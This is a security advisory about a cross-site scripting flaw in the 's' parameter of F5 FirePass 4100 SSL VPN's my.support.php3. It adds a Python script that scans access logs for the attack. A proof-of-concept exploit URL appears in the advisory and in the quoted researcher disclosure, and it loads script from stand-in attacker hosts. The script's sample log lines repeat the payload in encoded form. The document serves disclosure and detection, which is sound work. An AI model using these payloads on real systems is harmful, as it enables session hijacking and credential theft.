SecurityTracker.com
Category:   Device (Router/Bridge/Hub)  >   F5 FirePass
Vendors:   F5 Networks
F5 FirePass Input Validation Hole in 'my.support.php3' Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1015798
SecurityTracker URL:  http://securitytracker.com/id/1015798
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 21 2006
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): F5 Firepass 4100 SSL VPN version 5.4.2
Description:   A vulnerability was reported in F5 FirePass. A remote user can conduct cross-site scripting attacks.

The 'my.support.php3' script does not properly filter HTML code from user-supplied input in the 's' parameter before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the FirePass device and will run in the security context of that device. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the device, access data recently submitted by the target user via web form to the device, or take actions on the device acting as the target user.

A demonstration exploit URL is provided:

https://[target]/my.support.php3?c=1&s=username</title><img src=http://[attacker]/EXPLOIT.JS>&lang=en&charset=iso-8859-1&uilangchar=en.iso-8859-1

ILION Research Labs, Geneva Switzerland, discovered this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the FirePass device, access data recently submitted by the target user via web form to the device, or take actions on the device acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.f5.com/products/FirePass/
Cause:   Input validation error

Message History:   None.
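
With no vendor fix listed, one interim check is to review web access logs for requests to 'my.support.php3' whose 's' parameter decodes to HTML markup. The script below is an added example, not part of the original advisory or the vendor's code; the combined-log request format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: request lines look like Apache combined-log entries; adapt the
# regex to the access-log format actually produced in front of the device.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT = "/my.support.php3"
MARKUP_RE = re.compile(r'[<>"\']')  # characters that let input leave <title> text


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding, e.g. when a proxy log re-encodes the URL."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_s_values(log_lines):
    """Return (line_number, decoded_s) for requests to my.support.php3 whose
    's' parameter contains HTML metacharacters after decoding."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(SCRIPT):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("s", []):
            value = fully_decode(raw)
            if MARKUP_RE.search(value):
                hits.append((lineno, value))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Mar/2006:10:00:01 +0000] "GET /my.support.php3?c=1&s=username&lang=en HTTP/1.1" 200 512',
    '192.0.2.11 - - [21/Mar/2006:10:00:05 +0000] "GET /my.support.php3?c=1&s=username%3C/title%3E%3Cimg%20src=http://attacker.example/EXPLOIT.JS%3E&lang=en HTTP/1.1" 200 640',
    '192.0.2.12 - - [21/Mar/2006:10:00:09 +0000] "GET /my.support.php3?c=1&s=%253Cscript%253E HTTP/1.1" 200 600',
    '192.0.2.13 - - [21/Mar/2006:10:00:12 +0000] "GET /index.html?s=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for lineno, value in suspicious_s_values(SAMPLE_LOG):
        print(f"line {lineno}: s={value!r}")
```

A legitimate 's' value is expected to be plain text such as a username, so any hit is worth correlating with the Referer and the session that followed.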


 Source Message Contents

Subject:  XSS in Firepass 4100 SSL VPN v.5.4.2 (and probably others)

Vulnerability class : Cross-Site Scripting
Discovery date : 2nd of February 2006
Remote : Yes
Local : No
Credit : ILION Research Labs, Geneva Switzerland
Vulnerable : F5 Firepass 4100 SSL VPN v. 5.4.2

An XSS (Cross-Site-Scripting) vulnerability has been uncovered in my.support.php3 called through a Web browser on the F5 Firepass 4100 SSL VPN.

This allows an attacker to submit a crafted link to users of the vulnerable Web application in order to abuse their trust and steal their authentication credentials or hijack their sessions.

Trust abuse can be complete since the SSL certificate can appear as vouching for the trustworthiness of the website while the page actually displayed is hosted on a malicious third-party server (this can be done by using the <iframe> tag of IE for example).

Proof-of-concept exploit :

https://www.vulnerable_server.com/my.support.php3?c=1&s=username</title><img src=http://MALICIOUS_SERVER.COM/EXPLOIT.JS>&lang=en&charset=iso-8859-1&uilangchar=en.iso-8859-1

where http://MALICIOUS_SERVER.COM/EXPLOIT.JS is a malicious JavaScript interpreted by the victim's navigator.

 
 

